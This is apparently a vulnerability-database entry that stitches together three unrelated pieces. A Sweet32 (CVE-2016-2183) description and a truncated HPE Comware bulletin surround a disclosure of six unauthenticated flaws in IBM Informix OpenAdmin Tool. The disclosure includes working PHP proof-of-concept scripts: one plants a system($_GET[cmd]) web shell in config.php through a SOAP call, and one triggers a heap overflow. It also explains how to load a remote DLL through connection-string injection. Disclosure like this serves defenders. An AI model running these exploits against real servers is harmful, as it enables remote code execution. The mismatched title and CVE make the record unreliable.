Details of VAR-201609-0597

ID

VAR-201609-0597

CVE

CVE-2016-2183

TITLE

IBM Informix Dynamic Server DLL Injection / Code Execution

Trust: 0.1

sources: PACKETSTORM: 142756

DESCRIPTION

The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. IPSec (full name Internet Protocol Security) is a set of IP security protocols established by the IPSec group of the Internet Engineering Task Force (IETF). Both DES and Triple DES are encryption algorithms. There are information leakage vulnerabilities in the DES and Triple DES encryption algorithms used in the TLS, SSH, and IPSec protocols and other protocols and products. This vulnerability stems from configuration errors in network systems or products during operation. Vulnerabilities Summary The following advisory describes six (6) vulnerabilities found in Informix Dynamic Server and Informix Open Admin Tool. IBM Informix Dynamic Server Exceptional, low maintenance online transaction processing (OLTP) data server for enterprise and workgroup computing. IBM Informix Dynamic Server has many features that cater to a variety of user groups, including developers and administrators. One of the strong features of IDS is the low administration cost. IDS is well known for its hands-free administration. To make server administration even easier, a new open source, platform-independent tool called OpenAdmin Tool (OAT) is now available to IDS users. The OAT includes a graphical interface for administrative tasks and performance analysis tools. Vulnerabilities: Unauthentication static PHP code injection that leads to remote code execution Heap buffer overflow Remote DLL Injection that leads to remote code execution (1) Remote DLL Injection that leads to remote code execution (2) Remote DLL Injection that leads to remote code execution (3) Remote DLL Injection that leads to remote code execution (4) Credit An independent security researcher has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program Vendor response IBM has released patches to address those vulnerabilities and issued the following CVEas: CVE-2016-2183 CVE-2017-1092 For more Information a http://www-01.ibm.com/support/docview.wss?uid=swg22002897 Vulnerabilities Details IBM Informix Dynamic Server installs a PHP enable Apache server as a Windows Service (aApache_for_OATa) which listens on public port 8080 (tcp/http) for incoming requests to the OpenAdmin web panel. It runs with NT AUTHORITY\SYSTEM privileges. Unauthentication static PHP code injection that leads to remote code execution IBM Informix Dynamic Server Developer is vulnerable to Unauthentication static PHP code injection by invoking welcomeService.php which offers a SOAP interface. The welcomeServer.php class suffers of a static PHP code injection into the asaveHomePagea method. Arbitrary code can be injected into aconfig.phpa, which is accessible to remote users. Given this, a remote attacker could execute arbitrary code/commands with the privileges of the target service. Vulnerable code a C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\welcome\welcomeService.php ... <?php [..] $ini = ini_set("soap.wsdl_cache_enabled","0"); require_once("welcomeServer.php"); $server = new SoapServer("welcome.wsdl"); $server->setClass("welcomeServer"); if (isset($HTTP_RAW_POST_DATA)) { $request = $HTTP_RAW_POST_DATA; } else { $request = file_get_contents('php://input'); } $server->handle($request); ?> ... If we will look into saveHomePage() method inside C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\welcome\welcomeServer.php: ... /** * Save the selected home page in the config.php file. */ public function saveHomePage ($new_home_page) <--------------------------------------- { $this->idsadmin->load_lang("admin"); $conf_vars = $this->idsadmin->get_config("*"); // create backup of config file $src=$conf_vars['HOMEDIR']."/conf/config.php"; $dest=$conf_vars['HOMEDIR']."/conf/BAKconfig.php"; copy($src,$dest); // open the config file if (! is_writable($src)) { trigger_error($this->idsadmin->lang("SaveCfgFailure"). " $src"); return; } $fd = fopen($src,'w+'); <------------------------------ [*] // write out the config fputs($fd,"<?php \n"); foreach ($conf_vars as $k => $v) { if ($k == "HOMEPAGE") { $v = $new_home_page; <----------------------------------- [**] } else if ($k == "CONNDBDIR" || $k == "HOMEDIR") { // Replace backslashes in paths with forward slashes $this->idsadmin->in[$k] = str_replace('\\', '/', $this->idsadmin->in[$k]); /* idsdb00494581: An extra '"' gets written to $CONF['CONNDBDIR'] in config.php * silent install in /vobs/idsadmin/idsadmin/install/index.php:saveDefaultConfig() writes the above line * based on $conndbdir = addslashes(substr(@$_SERVER['argv'][3],11)); TODO: fix the initial writing into config.php (Windows only issue) */ if ($v[strlen($v)-1] == '"') { $v = substr($v, 0, -1); } } $out = "\$CONF['{$k}']=\"{$v}\";#{$this->idsadmin->lang($k)}\n"; <--------------------------- [***] fputs($fd,$out); <-------------------------------------- [****] } fputs($fd,"?>\n"); fclose($fd); return $new_home_page; } ... Note that $new_home_page is the unique parameter of a SOAP request and it is controlled; The resulting file could look like this: ... <?php $CONF['LANG']="en_US";#The default language for the OAT pages. $CONF['BASEURL']="http://WIN-PF2VMDT4MVO:8080/openadmin";#The URL where OAT is installed in this format: http://servername:port/location. $CONF['HOMEDIR']="C:/Program Files (x86)/IBM Informix Software Bundle/OAT/Apache_2.2.22/htdocs/openadmin/";#The directory for the OAT installation. $CONF['CONNDBDIR']="C:\Program Files (x86)\IBM Informix Software Bundle\OAT\OAT_conf";#The directory for the OAT connections database. Specify a secure directory that is not under the document directory for the web server. $CONF['HOMEPAGE']="";system($_GET[cmd]);//";#The page to use as the OAT home page. $CONF['PINGINTERVAL']="300";#The length of time (in seconds) between updates of the server status. The server status is shown on the Health Center > Dashboard > Group Summary page. $CONF['ROWSPERPAGE']="25";#The default number of rows per page to display when data is shown in a table format. $CONF['SECURESQL']="on";#Require login credentials for the SQL ToolBox. $CONF['INFORMIXCONTIME']="20";#The length of time (in seconds) that OAT attempts to connect to the database server before returning an error (INFORMIXCONTIME). $CONF['INFORMIXCONRETRY']="3";#The number of times that OAT attempts to connect to the database server during the Informix connect time (INFORMIXCONRETRY). $CONF['INFORMIXDIR']="C:\Program Files (x86)\IBM Informix Software Bundle";#MISSING LANG FILE ITEM INFORMIXDIR ?> ... config.php is not protected so we can execute system() through a GET request. Proof of Concept <?php error_reporting(0); $host = $argv[1]; $port = 8080; $shell = htmlentities("\";system(\$_GET[cmd]);//"); $data=' <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:Welcome"> <soapenv:Header/> <soapenv:Body> <urn:saveHomePage soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <new_home_page xsi:type="xsd:string">'.$shell.'</new_home_page> </urn:saveHomePage> </soapenv:Body> </soapenv:Envelope> '; $pk="POST /openadmin/services/welcome/welcomeService.php HTTP/1.1\r\n". "Host: ".$host."\r\n". "Content-Type: text/xml;charset=UTF-8 \r\n". "Content-Length: ".strlen($data)."\r\n". "SOAPAction: \"urn:QBEAction\"\r\n". "Connection: Close\r\n\r\n". $data; $fp = fsockopen($host,$port,$e,$err,5); fputs($fp,$pk); $out=""; while (!feof($fp)){ $out.=fread($fp,1); } fclose($fp); //echo $out."\n"; $pk="GET /openadmin/conf/config.php?cmd=whoami HTTP/1.0\r\n". "Host: ".$host."\r\n". "Connection: Close\r\n\r\n"; $fp = fsockopen($host,$port,$e,$err,5); fputs($fp,$pk); $out=""; while (!feof($fp)){ $out.=fread($fp,1); } fclose($fp); echo $out."\n"; ?> Heap buffer overflow IBM Informix Dynamic Server Developer is vulnerable to Unauthentication heap buffer overflow. By submitting connection parameters to index.php, through the aservera property, it is possible to trigger a heap buffer overflow vulnerability into the underlying PHP Informix extension (php_pdo_informix.dll). When attaching WinDbg to the httpd.exe sub-process, it shows: (1580.68c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=007b5360 ebx=04701bb0 ecx=007b5274 edx=00000276 esi=01010101 edi=046fe310 eip=007b14b5 esp=01f8f630 ebp=047677cc iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 php_pdo_informix+0x14b5: 007b14b5 894614 mov dword ptr [esi+14h],eax ds:002b:01010115=15ff012e esi is controlled by the attacker and could be used to execute arbitrary code or to create denial of service conditions 0:002> lm vm php_pdo_informix start end module name 014f0000 014fa000 php_pdo_informix (export symbols) C:\Program Files (x86)\IBM Informix Software Bundle\OAT\PHP_5.2.4\ext\php_pdo_informix.dll Loaded symbol image file: C:\Program Files (x86)\IBM Informix Software Bundle\OAT\PHP_5.2.4\ext\php_pdo_informix.dll Image path: C:\Program Files (x86)\IBM Informix Software Bundle\OAT\PHP_5.2.4\ext\php_pdo_informix.dll Image name: php_pdo_informix.dll Timestamp: Mon Jun 15 17:13:57 2009 (4A36E3C5) CheckSum: 00015E71 ImageSize: 0000A000 File version: 5.2.4.4 Product version: 5.2.4.0 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: The PHP Group ProductName: PHP php_pdo_informix.dll InternalName: php_pdo_informix.dll OriginalFilename: php_pdo_informix.dll ProductVersion: 5.2.4 FileVersion: 5.2.4.4 PrivateBuild: 5.2.4.4 SpecialBuild: 5.2.4.4 FileDescription: pdo_informix LegalCopyright: Copyright A(c) 1997-2007 The PHP Group LegalTrademarks: PHP Comments: Thanks to Rick McGuire, Dan Scott, Krishna Raman, Kellen Bombardier Proof of Concept <?php /* example connection string: informix:host=127.0.0.1;service=7360;database=sysmaster;protocol=onsoctcp;server=[0X01 X 69000] */ error_reporting(0); $host = $argv[1]; $port = 8080; $data="PASSWORD=*&USERNAME=*&SERVER=".str_repeat("\x01",69000)."&HOST=127.0.0.1&PORT=7360&IDSPROTOCOL=onsoctcp&TENANT_DBOWNER=&TENANT_DBNAME="; $pk="POST /openadmin/index.php?act=login&do=testconn HTTP/1.1\r\n". "Host: ".$host."\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: ".strlen($data)."\r\n". "Connection: Close\r\n\r\n". $data; $fp = fsockopen($host,$port,$e,$err,5); fputs($fp,$pk); $out=""; while (!feof($fp)){ $out.=fread($fp,1); } fclose($fp); echo $out."\n"; ?> Remote DLL Injection that leads to remote code execution (1) IBM Informix Dynamic Server Developer is vulnerable to Unauthentication Remote DLL Injection that leads to remote code execution. by submitting connection parameters to index.php, setting the aacta parameter to alogina and the adoa one to atestconna, it is possible to inject arbitrary statements into a connection string for the underlying Informix database. The __construct() method of the PDO_OAT.php library passing them to PDO::__construct() without prior sensitization Given this it is possible to inject the aTRANSLATIONDLLa connection parameter and to point it to an arbitrary dll from a remote network share, prepared by the attacker. If the dll entry point contains malicious code, this will be executed instantly. This can be done ex. through the aHOSTa parameter of a POST request. Vulnerable code a C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\modules\login.php ... function testconn($internal=false) { $state = 1; $statemessage="Online"; $servername = $this->idsadmin->in['SERVER'];<-------------------------------------- [*] $host = $this->idsadmin->in['HOST']; <------------------------------------------ $port = $this->idsadmin->in['PORT']; <------------------------------------------- $protocol = $this->idsadmin->in['IDSPROTOCOL']; <------------------------------------ // The below distinction (sysmaster/sysadmin) is needed to avoid the error (-570:Cannot reference an external ANSI database.) when a tenant owner's permissions are being verified. // The error happens when connecting to sysmaster and issuing the query (below, joining sysadmin:ph_allow_list and <tenant_db>:sysusers) to check against sysusers on an ansi db if (isset($this->idsadmin->in['TENANT_DBOWNER']) && ($this->idsadmin->in['TENANT_DBOWNER'] == 1 || $this->idsadmin->in['TENANT_DBOWNER'] == true)) { $dbname = "sysadmin"; } else { $dbname = "sysmaster"; } $user = $this->idsadmin->in['USERNAME']; <-------------------------------------- $passwd = $this->idsadmin->in['PASSWORD']; <---------------------------- $envvars = (isset($this->idsadmin->in['ENVVARS']))? $this->idsadmin->in['ENVVARS'] : null; require_once (ROOT_PATH."lib/PDO_OAT.php"); try { $tdb = new PDO_OAT($this->idsadmin,$servername,$host,$port,$protocol,$dbname,"",$envvars,$user,$passwd); <----------------------- [**] } catch(PDOException $e) { $message=preg_split("/:/",$e->getMessage()); $statemessage= $message[sizeof($message)-1]; $statemessage="{$this->idsadmin->lang('ConnectionFailed')} {$statemessage}"; $state=3; } if (isset($this->idsadmin->in['TENANT_DBOWNER']) && ($this->idsadmin->in['TENANT_DBOWNER'] == 1 || $this->idsadmin->in['TENANT_DBOWNER'] == 'true')) { if ($state == 3) { if ($internal) { return $statemessage; } else { $tdb=null; echo $statemessage; die(); } } $sql = "SELECT COUNT(*) as nameexists " . "FROM sysadmin:ph_allow_list al, {$this->idsadmin->in['TENANT_DBNAME']}:sysusers su " . "WHERE al.name = '{$this->idsadmin->in['USERNAME']}' " . "AND al.name = su.username " . "AND su.usertype IN ('D','R') " . "AND al.perm_list LIKE '%tenant%';"; try { $stmt = $tdb->query($sql,false,true); } catch (PDOException $e) { $err_code = $e->getCode(); $err_msg = $e->getMessage(); $statemessage = "{$this->idsadmin->lang('ConnectionFailed')} {$err_code}:{$err_msg}"; if ($internal) { return $statemessage; } else { $tdb=null; echo $statemessage; die(); } } $row = $stmt->fetch(); $stmt->closeCursor(); if ( $row['NAMEEXISTS'] == 0 ) { $statemessage = "{$this->idsadmin->lang('InsufficientPrivs')}"; } if ($internal) { return $statemessage; } else { $tdb=null; echo $statemessage; die(); } } $tdb=null; echo $statemessage; die(); } ... Letas look into C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\lib\PDO_OAT.php ... function __construct(&$idsadmin,$servername,$host,$port,$protocol,$dbname="sysmaster",$locale="",$envvars=null,$username="",$password="") { $this->idsadmin=&$idsadmin; $this->idsadmin->load_lang("database"); $this->dbname = $dbname; $informixdir = $this->idsadmin->get_config("INFORMIXDIR"); $dsn = self::getDSN($servername,$host,$port,$protocol,$informixdir,$dbname,$locale,$envvars); <---------------------- [***] putenv("INFORMIXCONTIME={$this->idsadmin->get_config("INFORMIXCONTIME",20)}"); putenv("INFORMIXCONRETRY={$this->idsadmin->get_config("INFORMIXCONRETRY",3)}"); parent::__construct($dsn,$username,utf8_decode($password)); <----------------------------------- [*****] } static function getDSN ($servername,$host,$port,$protocol,$informixdir,$dbname="sysmaster",$locale="",$envvars=null) { $dsn = "informix:host={$host}"; <------------------------------------ [****] $dsn .= ";service={$port}"; $dsn .= ";database={$dbname}"; $dsn .= ";protocol={$protocol}"; $dsn .= ";server={$servername}"; if ( substr(PHP_OS,0,3) != "WIN" ) { $libsuffix = (strtoupper(substr(PHP_OS,0,3)) == "DAR")? "dylib":"so"; $dsn .= ";TRANSLATIONDLL={$informixdir}/lib/esql/igo4a304.".$libsuffix; $dsn .= ";Driver={$informixdir}/lib/cli/libifdmr.".$libsuffix.";"; } if (!is_null($envvars) && $envvars != "" ) { // add envvars to connection string $dsn .= ";$envvars"; } if ( $locale != "" ) { // CLIENT_LOCALE should always be UTF-8 version of databse locale $client_locale = substr($locale,0,strrpos($locale,".")) . ".UTF8"; $dsn .= ";CLIENT_LOCALE={$client_locale};DB_LOCALE={$locale};"; } return $dsn; } ... At [***] the getDSN() function is called At [****] and following various parameters are concatenated into a connection string without prior sanitization and set to $dsn At [*****] the resulting connection string itas passed to PDO::__construct(), resulting in the dll to be loaded instantly. Remote DLL Injection that leads to remote code execution (2) IBM Informix Dynamic Server Developer is vulnerable to Unauthentication Remote DLL Injection that leads to remote code execution. By submitting a SOAP request to oliteService.php, specifying ex. the acanConnectToIDSa method, it is possible to inject arbitrary parameters into a database connection string for the underlying Informix database. It is possible to inject ex. the aTRANSLATIONDLLa parameter and, if this parameter points to a dll into an existing remote network share, the dll will be injected into the remote Apache process. If malicious code is contained into the dll entry point, this will be executed instantly. Vulnerable code is located inside the getDBConnection() function of the underlying oliteServer.php PHP class, where connection parameters are concatenated without prior sanitization. Vulnerable code a C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\olite\oliteService.php ... <?php [..] $ini = ini_set("soap.wsdl_cache_enabled","0"); require_once("oliteServer.php"); $server = new SoapServer("olite.wsdl"); $server->setClass("oliteServer"); if (isset($HTTP_RAW_POST_DATA)) { $request = $HTTP_RAW_POST_DATA; } else { $request = file_get_contents('php://input'); } $server->handle($request); ?> ... The SOAP interface can be interrogated without prior authentication, Letas take a look into acanConnectToIDSa method inside C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\olite\oliteServer.php ... /** * Verify that a connection to the server can be made. * @return true if a new PDO can be created and server version is >= 11, false otherwise */ function canConnectToIDS($server, $host, $port, $protocol, $username, $password, $lang="en_US") { $this->setOATLiteLang($lang); $sql = "SELECT DBINFO('version','major') AS vers FROM sysha_type "; $this->handlingPDOException = TRUE; try { $temp = $this->doDatabaseWork($sql, "sysmaster", $server, $host, $port, $protocol, $username, $password); <------------- [1] /* set handlingPDOException back to false in case this is used in a multi call */ $this->handlingPDOException = FALSE; } catch(PDOException $e) { return array("canConnect" => false, "message" => $e->getMessage()); } catch(Exception $e1) { //error_log("Could not connect, returning false"); return array("canConnect" => false, "message" => $e1->getMessage()); } //error_log(var_export($temp)); //error_log("temp: " . var_export($temp[0]['VERS'], true)); if($temp[0]['VERS'] < 11) { return array("canConnect" => false, "message" => $this->idsadmin->lang('ServerVersionLessThan11')); } else { return array("canConnect" => true, "message" => ""); } } ... $server, $host, $port, $protocol are received from the SOAP request and they are fully controlled; at [1] doDatabaseWork() is called, then look: ... /** * Runs query on specified database * @return array containing all selected records */ private function doDatabaseWork($sel, $dbname="sysmaster", $serverName, $host, $port, $protocol, $user, $password, $timeout = 10, $exceptions=false, $locale=NULL) { $ret = array(); if ( $this->useSameConnection == null ) $db = $this->getDBConnection($dbname, $serverName, $host, $port, $protocol, $user, $password, $timeout, $locale); <--------------------- [2] else $db = $this->useSameConnection; while (1 == 1) { $stmt = $db->query($sel); // not required as this is using the PDO->query not the $idsadmin->db->query ,false,$exceptions,$locale); $err = $db->errorInfo(); if ( $err[1] != 0 ) { trigger_error("{$err[1]} - {$err[2]}",E_USER_ERROR); } while ($row = $stmt->fetch(PDO::FETCH_ASSOC) ) { $ret[] = $row; } $err = $db->errorInfo(); if ( $err[2] == 0 ) { $stmt->closeCursor(); break; } else { $err = "Error: {$err[2]} - {$err[1]}"; $stmt->closeCursor(); trigger_error($err,E_USER_ERROR); continue; } } return $ret; } ... At [2] getDBConnection() is called with controlled parameters, finally look: ... /** * Gets connection to specified database */ function getDBConnection($dbname, $serverName, $host, $port, $protocol, $user, $password, $timeout = 10, $locale = null) { //$INFORMIXCONTIME=2; $INFORMIXCONRETRY=10; settype($timeout, 'integer'); putenv("INFORMIXCONTIME={$timeout}"); putenv("INFORMIXCONRETRY={$INFORMIXCONRETRY}"); $dsn .= "informix:host={$host}"; <------------------------------------ [3] $dsn .= ";service={$port}"; <---------------------------------- $dsn .= ";database={$dbname}"; <--------------------------------------- $dsn .= ";protocol={$protocol}"; <---------------------------------- $dsn .= ";server={$serverName}"; <------------------------------- $db = null; if(substr(PHP_OS,0,3) != "WIN") { $informixdir = $this->idsadmin->get_config("INFORMIXDIR"); $libsuffix = (strtoupper(substr(PHP_OS,0,3)) == "DAR") ? "dylib" : "so"; $dsn .= ";TRANSLATIONDLL={$informixdir}/lib/esql/igo4a304.".$libsuffix; $dsn .= ";Driver={$informixdir}/lib/cli/libifdmr.".$libsuffix.";"; } if ( $locale != null ) { $client_locale = substr($locale,0,strrpos($locale,".")) . ".UTF8"; $dsn .= ";CLIENT_LOCALE={$client_locale};DB_LOCALE={$locale};"; } if ( $this->handlingPDOException === FALSE ) { try { $db = new PDO ("{$dsn}",$user,utf8_decode($password) ); <------------------------------- [4] boom! } catch ( PDOException $e ) { //error_log(var_export ( $db->errorInfo() , true ) ); //trigger_error($e->getMessage(),E_USER_ERROR); $exception = $this->parsePDOException($e->getMessage()); throw new SoapFault("{$exception['code']}",$exception['message']); } } else { $db = new PDO ("{$dsn}",$user,$password); } return $db; } ... At [3] a connection string is concatenated without prior sanitization, arbitrary parameters can be injected via a;a; aTRANSLATIONDLLa and other dangerous parameters can be specified. At [4], the resulting connection string is passed to the PDO object, causing the dll to be loaded before the authentication is performed. Remote DLL Injection that leads to remote code execution (3) IBM Informix Dynamic Server Developer is vulnerable to Unauthentication Remote DLL Injection that leads to remote code execution. The specific flaw exists within two PHP scripts in OpenAdmin tool. MACH11Server.php allows to insert a row into the underlying SQLite Database without prior authentication, by sending a specific SOAP request to MACH11Service.php and specifying the aaddServerToCachea method. pinger.php construct a connection string for the underlying Informix database, based on the row previously inserted. Given this it is possible to inject the aTRANSLATIONDLLa property into this connection string and to cause the Apache process to load the pointed dll from a remote network share controlled by the attacker. vulnerable code a C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\idsadmin\MACH11Server.php ... function addServerToCache ($group_num , $host , $port , $server , $idsprotocol , $lat , $lon , $username , $password , $cluster_id , $last_type ) { $password = connections::encode_password($password); $query = "INSERT INTO connections " . " ( group_num " . " , host " . " , port " . " , server " . " , idsprotocol " . " , lat " . " , lon " . " , username " . " , password " . " , cluster_id " . " , last_type ) " . " VALUES ( {$group_num} " . " , '{$host}' " . " , '{$port}' " . " , '{$server}' " . " , '{$idsprotocol}'" . " , {$lat} " . " , {$lon} " . " , '{$username}' " . " , '{$password}' " . " , {$cluster_id} " . " , {$last_type} ) "; $this->doDatabaseWork ( $query ); return $this->db->lastInsertId ( ); //return sqlite_last_insert_rowid ( $this->db ); } ... The previously empty aconnectionsa table is populated with one row. Letas look at C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\lib\pinger.php <?php [..] register_shutdown_function("shutdownHandler",$db); ini_set("max_execution_time", -1); #set the maxexecution time.. set_time_limit(-1); ignore_user_abort(TRUE); @header( 'Content-Type: image/gif' ); print base64_decode( 'R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==' ); ob_flush(); /** * pinger * get / update the status of each server in the connections db. */ # set the CONFDIR define(CONFDIR,"../conf/"); require_once(CONFDIR."config.php"); $pinginterval=isset($CONF["PINGINTERVAL"]) ? $CONF["PINGINTERVAL"] : 300; if ( ! isset($CONF['CONNDBDIR']) ) { // error_log("Please check config.php param CONNDBDIR - it doesnt seem to be set."); return; } if ( ! is_dir($CONF['CONNDBDIR']) ) { error_log("Please check config.php param CONNDBDIR - it doesnt seem to be set to a directory."); return; } $dbfile="{$CONF['CONNDBDIR']}/connections.db"; $informixdir=getenv("INFORMIXDIR"); if ( ! file_exists($dbfile) ) { // error_log("*** Cannot find connections.db - {$dbfile} ****"); die(); } unset($CONF); # connect to the sqlite database. $db = new PDO ("sqlite:{$dbfile}"); $db->setAttribute(PDO::ATTR_CASE,PDO::CASE_UPPER); /** * lets get our last runtime and if we are running .. */ $qry = "select lastrun , isrunning from pingerinfo"; $stmt = $db->query($qry); $row = $stmt->fetch(PDO::FETCH_ASSOC); $stmt->closeCursor(); if ( $row['ISRUNNING'] > 0 ) { $timenow = time(); if ( $timenow - $row['LASTRUN'] > 3000 ) { error_log( "Reset pinger - should run next time "); $db->query("update pingerinfo set isrunning = 0"); } /* we are already running so lets just quit now */ die(); } $timenow = time(); if ( $timenow - $row['LASTRUN'] < $pinginterval ) { // error_log( "no need to run "."Last: ".($timenow - $row['LAST'])." - {$pinginterval}" ); die(); } $db->query("update pingerinfo set isrunning = {$timenow} "); // error_log ( "we better run "."Last: ".($timenow - $row['LAST'])." - {$pinginterval}" ); putenv("INFORMIXCONTIME=5"); putenv("INFORMIXCONRETRY=1"); /** * prepare the update string. */ $update = $db->prepare("update connections set lastpingtime=:now, laststatus=:state , laststatusmsg=:statemsg where conn_num = :conn_num"); $update2 = $db->prepare("update connections set lastpingtime=:now, laststatus=:state , laststatusmsg=:statemsg, lastonline=:lastonline where conn_num = :conn_num"); /** * we need to include the lib/connections.php * so we can access the password hooks functions. */ require_once 'connections.php'; /** * lets get all our defined connections. */ $sql = "select * from connections order by server"; $stmt = $db->query($sql); $rows = $stmt->fetchAll(PDO::FETCH_ASSOC); $starttime=time(); $status = "Start Time: {$starttime}\n"; foreach ( $rows as $k=>$row ) { $now = time(); $dsn = <<<EOF informix:host={$row['HOST']};service={$row['PORT']};database=sysmaster;server={$row['SERVER']};protocol={$row['IDSPROTOCOL']}; //<---------------------- [1] EOF; if ( substr(PHP_OS,0,3) != "WIN" ) { $libsuffix = (strtoupper(substr(PHP_OS,0,3)) == "DAR")? "dylib":"so"; $dsn .= ";TRANSLATIONDLL={$informixdir}/lib/esql/igo4a304.".$libsuffix; $dsn .= ";Driver={$informixdir}/lib/cli/libifdmr.".$libsuffix.";"; } $statemessage="Online"; $state=1; $user = $row['USERNAME']; $passwd = connections::decode_password( $row['PASSWORD'] ); try { $pingdb = new PDO($dsn,$user,utf8_decode($passwd)); <---------------------------------- [2] } catch(PDOException $e) { // error_log( $e->getMessage() ); $message=preg_split("/:/",$e->getMessage()); $statemessage= preg_replace("#\[.+\]#","",$message[1]); $statemessage.=" Last Online:".lastonlineconv($row['LASTONLINE']); $state=3; } [..] ... at [1] a connection string is concatenated with values taken from SQLite connection table. Arbitrary properties can be specified through a;a, leading to remote code execution, when [2] the PDO object is instantiated. Remote DLL Injection that leads to remote code execution (4) IBM Informix Dynamic Server Developer is vulnerable to Unauthentication Remote DLL Injection that leads to remote code execution. By contact the aadminapiService.phpa SOAP interface and constructing a proper request to this endpoint, with the acreateSBSpacea method specified, it possible to inject parameters into a connection string for the underlying Informix database. vulnerable code a C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\adminapi\adminapiService.php ... <?php [..] // turn of caching of the wsdl for now. $ini = ini_set("soap.wsdl_cache_enabled","0"); // load our actual server. require_once("adminapiServer.php"); //create our soapserver. $server = new SoapServer("adminapi.wsdl"); $server->setClass("adminapiServer"); if (isset($HTTP_RAW_POST_DATA)) { $request = $HTTP_RAW_POST_DATA; } else { $request = file_get_contents('php://input'); } //error_log($request); //error_log(var_export($server,true)); $server->handle($request); ?> ... There is no check before handling request. Letas look into the createSBSpace() method from C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\adminapi\adminapiServer.php ... function createSBSpace( $connectionObj,$dbsname,$path,$size,$offset ,$mpath="",$moffset="" ) { if (!dbsname) { throw new SoapFault("createSBSpace","missing param dbsname"); } if (!path) { throw new SoapFault("createSBSpace","missing param path"); } if (!size) { throw new SoapFault("createSBSpace","missing param size"); } if (!offset) { throw new SoapFault("createSBSpace","missing param offset"); } $qry = "execute function ".ADMIN_API_FUNCTION." ('create sbspace' "; $qry .= ",'{$dbsname}'"; $qry .= ",'{$path}'"; $qry .= ",'{$size}'"; $qry .= ",'{$offset}'"; if ( $mpath ) { $qry .= ",'{$mpath}'"; if ( $moffset ) { $qry .= ",'{$moffset}'"; } } $qry .= ")"; return $this->doDatabaseWork($connectionObj,$qry); <----------------------- [1] } // end createSBSpace ... at [1] doDatabaseWork() is called with a controlled $connectionObj parameter ... /** * doDatabaseWork * connectionObj = the connection details. * qry = the query to execute */ function doDatabaseWork($connectionObj,$qry) { require_once("soapdb.php"); $host = $connectionObj->host; $port = $connectionObj->port; $servername = $connectionObj->servername; $user = $connectionObj->user; $pass = $connectionObj->password; $protocol = $connectionObj->protocol; $dbname = "sysadmin"; $db = new soapdb($host,$port,$servername,$protocol,$dbname,$user,$pass); <-------------------------------- [2] $stmt = $db->query($qry); while ($row = $stmt->fetch() ) { $ret = implode("|",$row); } return $ret; } // end doDatabaseWork ... At [2] the asoapdba class is instantiated with controlled parameters __construct() method from C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\adminapi\soapdb.php ... /* function __construct * constructor */ function __construct($host,$port,$servername,$protocol="onsoctcp",$dbname="sysmaster",$user="",$passwd="") { #$persist = array( PDO::ATTR_PERSISTENT => false); $persist = array( PDO::ATTR_PERSISTENT => true); putenv("INFORMIXCONTIME=3"); putenv("INFORMIXCONRETRY=1"); $informixdir= getenv("INFORMIXDIR"); $dsn = <<<EOF informix:host={$host};service={$port};database={$dbname};server={$servername};protocol={$protocol}; <------------------------------ [3] EOF; try { parent::__construct($dsn,$user,utf8_decode($passwd),$persist); <---------------------------- [4] } catch(PDOException $e) { throw new SoapFault("Connection Failed:","DSN:{$dsn} ERROR:{$e->getMessage()}"); } } #end ___construct ... at [3] a connection string is concatenated with user-controlled parameters at [4] PDO::__construct() is called, then the dll is loaded by the Apache process. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05349499 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c05349499 Version: 1 HPSBHF03674 rev.1 HPE Comware 5 and Comware 7 Network Products using SSL/TLS, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2016-12-06 Last Updated: 2016-12-06 Potential Security Impact: Remote: Disclosure of Information Source: Hewlett Packard Enterprise, Product Security Response Team VULNERABILITY SUMMARY A potential security vulnerability in the DES/3DES block ciphers could potentially impact HPE Comware 5 and Comware 7 network products using SSL/TLS. This vulnerability could be exploited remotely resulting in disclosure of information. References: - CVE-2016-2183 - "SWEET32" attack SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - Comware 5 (CW5) Products All versions - Please refer to the RESOLUTION below for a list of impacted products. - Comware 7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of impacted products. BACKGROUND CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector CVE-2016-2183 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N) Information on CVSS is documented in HPE Customer Notice 